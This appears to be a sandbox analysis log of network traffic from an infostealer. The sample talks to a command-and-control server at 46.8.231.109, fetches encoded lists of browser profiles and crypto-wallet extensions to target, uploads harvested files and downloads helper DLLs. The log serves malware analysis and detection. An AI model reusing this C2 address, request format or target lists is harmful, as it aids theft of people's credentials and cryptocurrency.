31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 2, 2024 09:42:22.597675085 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Oct 2, 2024 09:42:22.629786015 CEST	466	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCF Host: 46.8.231.109 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 2d 2d 0d 0a Data Ascii: ------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="message"plugins------CAAKKFHCFIECAAAKEGCF--
Oct 2, 2024 09:42:22.813388109 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:22 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 2, 2024 09:42:22.813426018 CEST	224	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdk
Oct 2, 2024 09:42:22.813462973 CEST	1236	IN	Data Raw: 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 68 70 62 57 35 72 62 6d 39 38 4d 58 77 77 66 44 42 38 51 58 56 79 62 79 42 58 59 57 78 73 5a 58 51 6f 54 57 6c 75 59 53 42 51 63 6d 39 30 62 32 4e 76 62 43 6c 38 59 32 35 74 59 57 Data Ascii: b2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZhbGljYWpvb2x
Oct 2, 2024 09:42:22.813514948 CEST	1236	IN	Data Raw: 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d Data Ascii: Z2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamt
Oct 2, 2024 09:42:22.813550949 CEST	1236	IN	Data Raw: 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 Data Ascii: fDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J
Oct 2, 2024 09:42:22.813659906 CEST	672	IN	Data Raw: 62 32 52 6f 61 57 56 76 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 Data Ascii: b2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1
Oct 2, 2024 09:42:22.814069033 CEST	1236	IN	Data Raw: 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 64 74 63 47 4e 77 5a 32 78 77 62 6d 64 6b 62 32 46 73 59 6d 64 6c 62 32 78 6b 5a 57 46 71 5a 6d 4e 73 62 6d 68 68 5a 6d 46 38 4d 58 77 77 66 44 Data Ascii: amthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1qYmNmb2Zjb25rYW5uam9uZm1qamFqcGxsZGRiZ3wxfDB8MHx
Oct 2, 2024 09:42:22.814105034 CEST	268	IN	Data Raw: 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d 5a 73 5a 57 78 76 59 33 42 68 61 33 77 78 66 44 42 38 4d 48 78 55 54 30 34 67 56 32 46 73 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57 Data Ascii: dHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJ
Oct 2, 2024 09:42:22.856116056 CEST	467	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIECFHDBAAECAAKFHDHI Host: 46.8.231.109 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 2d 2d 0d 0a Data Ascii: ------IIECFHDBAAECAAKFHDHIContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------IIECFHDBAAECAAKFHDHIContent-Disposition: form-data; name="message"fplugins------IIECFHDBAAECAAKFHDHI--
Oct 2, 2024 09:42:23.036797047 CEST	335	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:22 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 2, 2024 09:42:23.085545063 CEST	200	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGCFCBAKKFBFIECAEBA Host: 46.8.231.109 Content-Length: 6383 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 09:42:23.085580111 CEST	6383	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 Data Ascii: ------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 2, 2024 09:42:23.376301050 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:42:23.379214048 CEST	91	OUT	GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Oct 2, 2024 09:42:23.557097912 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:23 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 2, 2024 09:42:23.557171106 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Oct 2, 2024 09:42:24.557174921 CEST	200	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECFHIJKJKFIDHJKFBGHC Host: 46.8.231.109 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 09:42:24.856616974 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:42:24.935800076 CEST	200	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJK Host: 46.8.231.109 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 09:42:25.218333960 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:42:25.239682913 CEST	562	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDHDGDHJEGHIDGDHCGC Host: 46.8.231.109 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="file"------HIDHDGDHJEGHIDGDHCGC--
Oct 2, 2024 09:42:25.447926998 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:42:25.745559931 CEST	562	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAEHIDAKECFIEBGDHJEB Host: 46.8.231.109 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="file"------AAEHIDAKECFIEBGDHJEB--
Oct 2, 2024 09:42:25.947825909 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:42:26.223587036 CEST	91	OUT	GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1 Host: 46.8.231.109 Cache-Control: no-cache
Oct 2, 2024 09:42:26.403867960 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:26 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 